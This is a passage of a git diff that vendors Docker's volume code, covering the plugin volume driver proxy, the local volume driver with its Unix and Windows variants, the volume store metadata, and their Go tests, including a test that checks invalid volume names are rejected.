volumeDriverProxyCreateRequest + ret volumeDriverProxyCreateResponse + ) + + req.Name = name + req.Opts = opts + if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyRemoveRequest struct { + Name string +} + +type volumeDriverProxyRemoveResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Remove(name string) (err error) { + var ( + req volumeDriverProxyRemoveRequest + ret volumeDriverProxyRemoveResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyPathRequest struct { + Name string +} + +type volumeDriverProxyPathResponse struct { + Mountpoint string + Err string +} + +func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) { + var ( + req volumeDriverProxyPathRequest + ret volumeDriverProxyPathResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil { + return + } + + mountpoint = ret.Mountpoint + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyMountRequest struct { + Name string + ID string +} + +type volumeDriverProxyMountResponse struct { + Mountpoint string + Err string +} + +func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, err error) { + var ( + req volumeDriverProxyMountRequest + ret volumeDriverProxyMountResponse + ) + + req.Name = name + req.ID = id + if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil { + return + } + + mountpoint = ret.Mountpoint + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyUnmountRequest struct { + Name string + ID string +} + +type volumeDriverProxyUnmountResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) { + var ( + req volumeDriverProxyUnmountRequest + ret volumeDriverProxyUnmountResponse + ) + + req.Name = name + req.ID = id + if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyListRequest struct { +} + +type volumeDriverProxyListResponse struct { + Volumes []*proxyVolume + Err string +} + +func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) { + var ( + req volumeDriverProxyListRequest + ret volumeDriverProxyListResponse + ) + + if err = pp.Call("VolumeDriver.List", req, &ret); err != nil { + return + } + + volumes = ret.Volumes + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyGetRequest struct { + Name string +} + +type volumeDriverProxyGetResponse struct { + Volume *proxyVolume + Err string +} + +func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) { + var ( + req volumeDriverProxyGetRequest + ret volumeDriverProxyGetResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil { + return + } + + volume = ret.Volume + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyCapabilitiesRequest struct { +} + +type volumeDriverProxyCapabilitiesResponse struct { + Capabilities volume.Capability + Err string +} + +func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err error) { + var ( + req volumeDriverProxyCapabilitiesRequest + ret volumeDriverProxyCapabilitiesResponse + ) + + if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil { + return + } + + capabilities = ret.Capabilities + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go new file mode 100644 index 0000000000..b78c46a036 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go @@ -0,0 +1,132 @@ +package volumedrivers + +import ( + "fmt" + "net/http" + "net/http/httptest" + "net/url" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-connections/tlsconfig" +) + +func TestVolumeRequestError(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + defer server.Close() + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot create volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot remove volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot mount volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot unmount volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Unknown volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot list volumes"}`) + }) + + mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot get volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + http.Error(w, "error", 500) + }) + + u, _ := url.Parse(server.URL) + client, err := plugins.NewClient("tcp://"+u.Host, &tlsconfig.Options{InsecureSkipVerify: true}) + if err != nil { + t.Fatal(err) + } + + driver := volumeDriverProxy{client} + + if err = driver.Create("volume", nil); err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot create volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Mount("volume", "123") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot mount volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + err = driver.Unmount("volume", "123") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot unmount volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + err = driver.Remove("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot remove volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Path("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Unknown volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.List() + if err == nil { + t.Fatal("Expected error, was nil") + } + if !strings.Contains(err.Error(), "Cannot list volumes") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Get("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + if !strings.Contains(err.Error(), "Cannot get volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Capabilities() + if err == nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go new file mode 100644 index 0000000000..62c45e69ea --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local.go @@ -0,0 +1,364 @@ +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "strings" + "sync" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume" +) + +// VolumeDataPathName is the name of the directory where the volume data is stored. +// It uses a very distinctive name to avoid collisions migrating data between +// Docker versions. +const ( + VolumeDataPathName = "_data" + volumesPathName = "volumes" +) + +var ( + // ErrNotFound is the typed error returned when the requested volume name can't be found + ErrNotFound = fmt.Errorf("volume not found") + // volumeNameRegex ensures the name assigned for the volume is valid. + // This name is used to create the bind directory, so we need to avoid characters that + // would make the path to escape the root directory. + volumeNameRegex = utils.RestrictedNamePattern +) + +type validationError struct { + error +} + +func (validationError) IsValidationError() bool { + return true +} + +type activeMount struct { + count uint64 + mounted bool +} + +// New instantiates a new Root instance with the provided scope. Scope +// is the base path that the Root instance uses to store its +// volumes. The base path is created here if it does not exist. +func New(scope string, rootUID, rootGID int) (*Root, error) { + rootDirectory := filepath.Join(scope, volumesPathName) + + if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil { + return nil, err + } + + r := &Root{ + scope: scope, + path: rootDirectory, + volumes: make(map[string]*localVolume), + rootUID: rootUID, + rootGID: rootGID, + } + + dirs, err := ioutil.ReadDir(rootDirectory) + if err != nil { + return nil, err + } + + mountInfos, err := mount.GetMounts() + if err != nil { + logrus.Debugf("error looking up mounts for local volume cleanup: %v", err) + } + + for _, d := range dirs { + if !d.IsDir() { + continue + } + + name := filepath.Base(d.Name()) + v := &localVolume{ + driverName: r.Name(), + name: name, + path: r.DataPath(name), + } + r.volumes[name] = v + optsFilePath := filepath.Join(rootDirectory, name, "opts.json") + if b, err := ioutil.ReadFile(optsFilePath); err == nil { + opts := optsConfig{} + if err := json.Unmarshal(b, &opts); err != nil { + return nil, errors.Wrapf(err, "error while unmarshaling volume options for volume: %s", name) + } + // Make sure this isn't an empty optsConfig. + // This could be empty due to buggy behavior in older versions of Docker. + if !reflect.DeepEqual(opts, optsConfig{}) { + v.opts = &opts + } + + // unmount anything that may still be mounted (for example, from an unclean shutdown) + for _, info := range mountInfos { + if info.Mountpoint == v.path { + mount.Unmount(v.path) + break + } + } + } + } + + return r, nil +} + +// Root implements the Driver interface for the volume package and +// manages the creation/removal of volumes. It uses only standard vfs +// commands to create/remove dirs within its provided scope. +type Root struct { + m sync.Mutex + scope string + path string + volumes map[string]*localVolume + rootUID int + rootGID int +} + +// List lists all the volumes +func (r *Root) List() ([]volume.Volume, error) { + var ls []volume.Volume + r.m.Lock() + for _, v := range r.volumes { + ls = append(ls, v) + } + r.m.Unlock() + return ls, nil +} + +// DataPath returns the constructed path of this volume. +func (r *Root) DataPath(volumeName string) string { + return filepath.Join(r.path, volumeName, VolumeDataPathName) +} + +// Name returns the name of Root, defined in the volume package in the DefaultDriverName constant. +func (r *Root) Name() string { + return volume.DefaultDriverName +} + +// Create creates a new volume.Volume with the provided name, creating +// the underlying directory tree required for this volume in the +// process. +func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error) { + if err := r.validateName(name); err != nil { + return nil, err + } + + r.m.Lock() + defer r.m.Unlock() + + v, exists := r.volumes[name] + if exists { + return v, nil + } + + path := r.DataPath(name) + if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil { + if os.IsExist(err) { + return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path)) + } + return nil, errors.Wrapf(err, "error while creating volume path '%s'", path) + } + + var err error + defer func() { + if err != nil { + os.RemoveAll(filepath.Dir(path)) + } + }() + + v = &localVolume{ + driverName: r.Name(), + name: name, + path: path, + } + + if len(opts) != 0 { + if err = setOpts(v, opts); err != nil { + return nil, err + } + var b []byte + b, err = json.Marshal(v.opts) + if err != nil { + return nil, err + } + if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil { + return nil, errors.Wrap(err, "error while persisting volume options") + } + } + + r.volumes[name] = v + return v, nil +} + +// Remove removes the specified volume and all underlying data. If the +// given volume does not belong to this driver and an error is +// returned. The volume is reference counted, if all references are +// not released then the volume is not removed. +func (r *Root) Remove(v volume.Volume) error { + r.m.Lock() + defer r.m.Unlock() + + lv, ok := v.(*localVolume) + if !ok { + return fmt.Errorf("unknown volume type %T", v) + } + + realPath, err := filepath.EvalSymlinks(lv.path) + if err != nil { + if !os.IsNotExist(err) { + return err + } + realPath = filepath.Dir(lv.path) + } + + if !r.scopedPath(realPath) { + return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath) + } + + if err := removePath(realPath); err != nil { + return err + } + + delete(r.volumes, lv.name) + return removePath(filepath.Dir(lv.path)) +} + +func removePath(path string) error { + if err := os.RemoveAll(path); err != nil { + if os.IsNotExist(err) { + return nil + } + return errors.Wrapf(err, "error removing volume path '%s'", path) + } + return nil +} + +// Get looks up the volume for the given name and returns it if found +func (r *Root) Get(name string) (volume.Volume, error) { + r.m.Lock() + v, exists := r.volumes[name] + r.m.Unlock() + if !exists { + return nil, ErrNotFound + } + return v, nil +} + +// Scope returns the local volume scope +func (r *Root) Scope() string { + return volume.LocalScope +} + +func (r *Root) validateName(name string) error { + if len(name) == 1 { + return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")} + } + if !volumeNameRegex.MatchString(name) { + return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)} + } + return nil +} + +// localVolume implements the Volume interface from the volume package and +// represents the volumes created by Root. +type localVolume struct { + m sync.Mutex + // unique name of the volume + name string + // path is the path on the host where the data lives + path string + // driverName is the name of the driver that created the volume. + driverName string + // opts is the parsed list of options used to create the volume + opts *optsConfig + // active refcounts the active mounts + active activeMount +} + +// Name returns the name of the given Volume. +func (v *localVolume) Name() string { + return v.name +} + +// DriverName returns the driver that created the given Volume. +func (v *localVolume) DriverName() string { + return v.driverName +} + +// Path returns the data location. +func (v *localVolume) Path() string { + return v.path +} + +// Mount implements the localVolume interface, returning the data location. +func (v *localVolume) Mount(id string) (string, error) { + v.m.Lock() + defer v.m.Unlock() + if v.opts != nil { + if !v.active.mounted { + if err := v.mount(); err != nil { + return "", err + } + v.active.mounted = true + } + v.active.count++ + } + return v.path, nil +} + +// Umount is for satisfying the localVolume interface and does not do anything in this driver. +func (v *localVolume) Unmount(id string) error { + v.m.Lock() + defer v.m.Unlock() + if v.opts != nil { + v.active.count-- + if v.active.count == 0 { + if err := mount.Unmount(v.path); err != nil { + v.active.count++ + return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path) + } + v.active.mounted = false + } + } + return nil +} + +func validateOpts(opts map[string]string) error { + for opt := range opts { + if !validOpts[opt] { + return validationError{fmt.Errorf("invalid option key: %q", opt)} + } + } + return nil +} + +func (v *localVolume) Status() map[string]interface{} { + return nil +} + +// getAddress finds out address/hostname from options +func getAddress(opts string) string { + optsList := strings.Split(opts, ",") + for i := 0; i < len(optsList); i++ { + if strings.HasPrefix(optsList[i], "addr=") { + addr := (strings.SplitN(optsList[i], "=", 2)[1]) + return addr + } + } + return "" +} diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go new file mode 100644 index 0000000000..f5a519b883 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_test.go @@ -0,0 +1,344 @@ +package local + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/pkg/mount" +) + +func TestGetAddress(t *testing.T) { + cases := map[string]string{ + "addr=11.11.11.1": "11.11.11.1", + " ": "", + "addr=": "", + "addr=2001:db8::68": "2001:db8::68", + } + for name, success := range cases { + v := getAddress(name) + if v != success { + t.Errorf("Test case failed for %s actual: %s expected : %s", name, v, success) + } + } + +} + +func TestRemove(t *testing.T) { + // TODO Windows: Investigate why this test fails on Windows under CI + // but passes locally. + if runtime.GOOS == "windows" { + t.Skip("Test failing on Windows CI") + } + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + vol, err := r.Create("testing", nil) + if err != nil { + t.Fatal(err) + } + + if err := r.Remove(vol); err != nil { + t.Fatal(err) + } + + vol, err = r.Create("testing2", nil) + if err != nil { + t.Fatal(err) + } + if err := os.RemoveAll(vol.Path()); err != nil { + t.Fatal(err) + } + + if err := r.Remove(vol); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(vol.Path()); err != nil && !os.IsNotExist(err) { + t.Fatal("volume dir not removed") + } + + if l, _ := r.List(); len(l) != 0 { + t.Fatal("expected there to be no volumes") + } +} + +func TestInitializeWithVolumes(t *testing.T) { + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + vol, err := r.Create("testing", nil) + if err != nil { + t.Fatal(err) + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + v, err := r.Get(vol.Name()) + if err != nil { + t.Fatal(err) + } + + if v.Path() != vol.Path() { + t.Fatal("expected to re-initialize root with existing volumes") + } +} + +func TestCreate(t *testing.T) { + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + cases := map[string]bool{ + "name": true, + "name-with-dash": true, + "name_with_underscore": true, + "name/with/slash": false, + "name/with/../../slash": false, + "./name": false, + "../name": false, + "./": false, + "../": false, + "~": false, + ".": false, + "..": false, + "...": false, + } + + for name, success := range cases { + v, err := r.Create(name, nil) + if success { + if err != nil { + t.Fatal(err) + } + if v.Name() != name { + t.Fatalf("Expected volume with name %s, got %s", name, v.Name()) + } + } else { + if err == nil { + t.Fatalf("Expected error creating volume with name %s, got nil", name) + } + } + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } +} + +func TestValidateName(t *testing.T) { + r := &Root{} + names := map[string]bool{ + "x": false, + "/testvol": false, + "thing.d": true, + "hello-world": true, + "./hello": false, + ".hello": false, + } + + for vol, expected := range names { + err := r.validateName(vol) + if expected && err != nil { + t.Fatalf("expected %s to be valid got %v", vol, err) + } + if !expected && err == nil { + t.Fatalf("expected %s to be invalid", vol) + } + } +} + +func TestCreateWithOpts(t *testing.T) { + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip() + } + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test", map[string]string{"invalidopt": "notsupported"}); err == nil { + t.Fatal("expected invalid opt to cause error") + } + + vol, err := r.Create("test", map[string]string{"device": "tmpfs", "type": "tmpfs", "o": "size=1m,uid=1000"}) + if err != nil { + t.Fatal(err) + } + v := vol.(*localVolume) + + dir, err := v.Mount("1234") + if err != nil { + t.Fatal(err) + } + defer func() { + if err := v.Unmount("1234"); err != nil { + t.Fatal(err) + } + }() + + mountInfos, err := mount.GetMounts() + if err != nil { + t.Fatal(err) + } + + var found bool + for _, info := range mountInfos { + if info.Mountpoint == dir { + found = true + if info.Fstype != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Fstype) + } + if info.Source != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Source) + } + if !strings.Contains(info.VfsOpts, "uid=1000") { + t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) + } + if !strings.Contains(info.VfsOpts, "size=1024k") { + t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) + } + break + } + } + + if !found { + t.Fatal("mount not found") + } + + if v.active.count != 1 { + t.Fatalf("Expected active mount count to be 1, got %d", v.active.count) + } + + // test double mount + if _, err := v.Mount("1234"); err != nil { + t.Fatal(err) + } + if v.active.count != 2 { + t.Fatalf("Expected active mount count to be 2, got %d", v.active.count) + } + + if err := v.Unmount("1234"); err != nil { + t.Fatal(err) + } + if v.active.count != 1 { + t.Fatalf("Expected active mount count to be 1, got %d", v.active.count) + } + + mounted, err := mount.Mounted(v.path) + if err != nil { + t.Fatal(err) + } + if !mounted { + t.Fatal("expected mount to still be active") + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + v2, exists := r.volumes["test"] + if !exists { + t.Fatal("missing volume on restart") + } + + if !reflect.DeepEqual(v.opts, v2.opts) { + t.Fatal("missing volume options on restart") + } +} + +func TestRealodNoOpts(t *testing.T) { + rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test1", nil); err != nil { + t.Fatal(err) + } + if _, err := r.Create("test2", nil); err != nil { + t.Fatal(err) + } + // make sure a file with `null` (.e.g. empty opts map from older daemon) is ok + if err := ioutil.WriteFile(filepath.Join(rootDir, "test2"), []byte("null"), 600); err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test3", nil); err != nil { + t.Fatal(err) + } + // make sure an empty opts file doesn't break us too + if err := ioutil.WriteFile(filepath.Join(rootDir, "test3"), nil, 600); err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test4", map[string]string{}); err != nil { + t.Fatal(err) + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + for _, name := range []string{"test1", "test2", "test3", "test4"} { + v, err := r.Get(name) + if err != nil { + t.Fatal(err) + } + lv, ok := v.(*localVolume) + if !ok { + t.Fatalf("expected *localVolume got: %v", reflect.TypeOf(v)) + } + if lv.opts != nil { + t.Fatalf("expected opts to be nil, got: %v", lv.opts) + } + if _, err := lv.Mount("1234"); err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go new file mode 100644 index 0000000000..fb08862cef --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_unix.go @@ -0,0 +1,87 @@ +// +build linux freebsd solaris + +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "fmt" + "net" + "path/filepath" + "strings" + + "github.com/pkg/errors" + + "github.com/docker/docker/pkg/mount" +) + +var ( + oldVfsDir = filepath.Join("vfs", "dir") + + validOpts = map[string]bool{ + "type": true, // specify the filesystem type for mount, e.g. nfs + "o": true, // generic mount options + "device": true, // device to mount from + } +) + +type optsConfig struct { + MountType string + MountOpts string + MountDevice string +} + +func (o *optsConfig) String() string { + return fmt.Sprintf("type='%s' device='%s' o='%s'", o.MountType, o.MountDevice, o.MountOpts) +} + +// scopedPath verifies that the path where the volume is located +// is under Docker's root and the valid local paths. +func (r *Root) scopedPath(realPath string) bool { + // Volumes path for Docker version >= 1.7 + if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) { + return true + } + + // Volumes path for Docker version < 1.7 + if strings.HasPrefix(realPath, filepath.Join(r.scope, oldVfsDir)) { + return true + } + + return false +} + +func setOpts(v *localVolume, opts map[string]string) error { + if len(opts) == 0 { + return nil + } + if err := validateOpts(opts); err != nil { + return err + } + + v.opts = &optsConfig{ + MountType: opts["type"], + MountOpts: opts["o"], + MountDevice: opts["device"], + } + return nil +} + +func (v *localVolume) mount() error { + if v.opts.MountDevice == "" { + return fmt.Errorf("missing device in volume options") + } + mountOpts := v.opts.MountOpts + if v.opts.MountType == "nfs" { + if addrValue := getAddress(v.opts.MountOpts); addrValue != "" && net.ParseIP(addrValue).To4() == nil { + ipAddr, err := net.ResolveIPAddr("ip", addrValue) + if err != nil { + return errors.Wrapf(err, "error resolving passed in nfs address") + } + mountOpts = strings.Replace(mountOpts, "addr="+addrValue, "addr="+ipAddr.String(), 1) + } + } + err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts) + return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts) +} diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go new file mode 100644 index 0000000000..1bdb368a0f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_windows.go @@ -0,0 +1,34 @@ +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "fmt" + "path/filepath" + "strings" +) + +type optsConfig struct{} + +var validOpts map[string]bool + +// scopedPath verifies that the path where the volume is located +// is under Docker's root and the valid local paths. +func (r *Root) scopedPath(realPath string) bool { + if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) { + return true + } + return false +} + +func setOpts(v *localVolume, opts map[string]string) error { + if len(opts) > 0 { + return fmt.Errorf("options are not supported on this platform") + } + return nil +} + +func (v *localVolume) mount() error { + return nil +} diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/store/db.go new file mode 100644 index 0000000000..c5fd1643f5 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/db.go @@ -0,0 +1,88 @@ +package store + +import ( + "encoding/json" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/pkg/errors" +) + +var volumeBucketName = []byte("volumes") + +type volumeMetadata struct { + Name string + Driver string + Labels map[string]string + Options map[string]string +} + +func (s *VolumeStore) setMeta(name string, meta volumeMetadata) error { + return s.db.Update(func(tx *bolt.Tx) error { + return setMeta(tx, name, meta) + }) +} + +func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error { + metaJSON, err := json.Marshal(meta) + if err != nil { + return err + } + b := tx.Bucket(volumeBucketName) + return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata") +} + +func (s *VolumeStore) getMeta(name string) (volumeMetadata, error) { + var meta volumeMetadata + err := s.db.View(func(tx *bolt.Tx) error { + return getMeta(tx, name, &meta) + }) + return meta, err +} + +func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error { + b := tx.Bucket(volumeBucketName) + val := b.Get([]byte(name)) + if string(val) == "" { + return nil + } + if err := json.Unmarshal(val, meta); err != nil { + return errors.Wrap(err, "error unmarshaling volume metadata") + } + return nil +} + +func (s *VolumeStore) removeMeta(name string) error { + return s.db.Update(func(tx *bolt.Tx) error { + return removeMeta(tx, name) + }) +} + +func removeMeta(tx *bolt.Tx, name string) error { + b := tx.Bucket(volumeBucketName) + return errors.Wrap(b.Delete([]byte(name)), "error removing volume metadata") +} + +// listMeta is used during restore to get the list of volume metadata +// from the on-disk database. +// Any errors that occur are only logged. +func listMeta(tx *bolt.Tx) []volumeMetadata { + var ls []volumeMetadata + b := tx.Bucket(volumeBucketName) + b.ForEach(func(k, v []byte) error { + if len(v) == 0 { + // don't try to unmarshal an empty value + return nil + } + + var m volumeMetadata + if err := json.Unmarshal(v, &m); err != nil { + // Just log the error + logrus.Errorf("Error while reading volume metadata for volume %q: %v", string(k), err) + return nil + } + ls = append(ls, m) + return nil + }) + return ls +} diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/store/errors.go new file mode 100644 index 0000000000..980175f29c --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/errors.go @@ -0,0 +1,76 @@ +package store + +import ( + "strings" + + "github.com/pkg/errors" +) + +var ( + // errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container + errVolumeInUse = errors.New("volume is in use") + // errNoSuchVolume is a typed error returned if the requested volume doesn't exist in the volume store + errNoSuchVolume = errors.New("no such volume") + // errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform + errInvalidName = errors.New("volume name is not valid on this platform") + // errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver + errNameConflict = errors.New("volume name must be unique") +) + +// OpErr is the error type returned by functions in the store package. It describes +// the operation, volume name, and error. +type OpErr struct { + // Err is the error that occurred during the operation. + Err error + // Op is the operation which caused the error, such as "create", or "list". + Op string + // Name is the name of the resource being requested for this op, typically the volume name or the driver name. + Name string + // Refs is the list of references associated with the resource. + Refs []string +} + +// Error satisfies the built-in error interface type. +func (e *OpErr) Error() string { + if e == nil { + return "" + } + s := e.Op + if e.Name != "" { + s = s + " " + e.Name + } + + s = s + ": " + e.Err.Error() + if len(e.Refs) > 0 { + s = s + " - " + "[" + strings.Join(e.Refs, ", ") + "]" + } + return s +} + +// IsInUse returns a boolean indicating whether the error indicates that a +// volume is in use +func IsInUse(err error) bool { + return isErr(err, errVolumeInUse) +} + +// IsNotExist returns a boolean indicating whether the error indicates that the volume does not exist +func IsNotExist(err error) bool { + return isErr(err, errNoSuchVolume) +} + +// IsNameConflict returns a boolean indicating whether the error indicates that a +// volume name is already taken +func IsNameConflict(err error) bool { + return isErr(err, errNameConflict) +} + +func isErr(err error, expected error) bool { + err = errors.Cause(err) + switch pe := err.(type) { + case nil: + return false + case *OpErr: + err = errors.Cause(pe.Err) + } + return err == expected +} diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/store/restore.go new file mode 100644 index 0000000000..c0c5b519bc --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/restore.go @@ -0,0 +1,83 @@ +package store + +import ( + "sync" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" +) + +// restore is called when a new volume store is created. +// It's primary purpose is to ensure that all drivers' refcounts are set based +// on known volumes after a restart. +// This only attempts to track volumes that are actually stored in the on-disk db. +// It does not probe the available drivers to find anything that may have been added +// out of band. +func (s *VolumeStore) restore() { + var ls 